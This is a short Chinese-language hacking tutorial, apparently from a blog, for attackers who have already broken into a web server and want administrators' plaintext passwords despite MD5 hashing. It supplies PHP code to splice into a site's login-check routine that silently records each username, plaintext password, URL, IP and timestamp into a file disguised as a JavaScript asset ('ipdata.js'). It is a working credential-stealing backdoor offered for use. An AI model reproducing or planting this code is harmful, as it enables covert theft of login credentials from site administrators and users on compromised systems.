社工利器后台密码截获方法

当我们利用非正常方法拿下一台服务器或者一台服务器里的站时,这时也许不是我们最终的目的,为了得到管理员明文密码但又在md5困住了,于是我们可以运用这个方法截获管理员密码
在我们需要截获的网站后台加入:

加在网站正常程序对用户密码进行判断的位置

$ip=$_SERVER['REMOTE_ADDR']; //获取ip
 $showtime=date("Y-m-d H:i:s"); //获取日期
 $cururl=GetCurUrl();(自己写获取登入路径的函数) //获取登入页面
 $record="Username:".$userid." Password:".$pwd." Url:".$cururl." IP:".$ip." Time:".$showtime." \r\n";// 组成成字符串集 里面变量自己更改
 $handle=fopen('../include/data/ipdata.js','a+'); fopen以读写创建打开文件
 $write=fwrite($handle,$record); //fwrite函数把刚才的字符串写进文件保存
 
function getCurUrl() {
 if (! empty ( $_SERVER [\"REQUEST_URI\"] )) {
 $scriptName = $_SERVER [\"REQUEST_URI\"];
 $nowurl = $scriptName;
 } else {
 $scriptName = $_SERVER [\"PHP_SELF\"];
 if (empty ( $_SERVER [\"QUERY_STRING\"] )) {
 $nowurl = $scriptName;
 } else {
 $nowurl = $scriptName . \"?\" . $_SERVER [\"QUERY_STRING\"];
 }
 }
 return $nowurl;
 } 自定义获取当前脚本所在url

 

你可能感兴趣的:(社工利器后台密码截获方法)